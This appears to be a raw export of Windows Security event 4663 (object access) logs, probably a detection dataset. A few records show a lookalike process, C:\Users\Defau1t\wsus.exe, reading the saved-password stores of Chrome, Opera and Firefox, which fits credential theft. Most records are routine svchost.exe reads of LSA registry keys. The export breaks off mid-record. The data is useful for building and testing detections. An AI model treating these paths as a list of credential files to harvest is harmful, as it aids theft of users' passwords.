+ 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 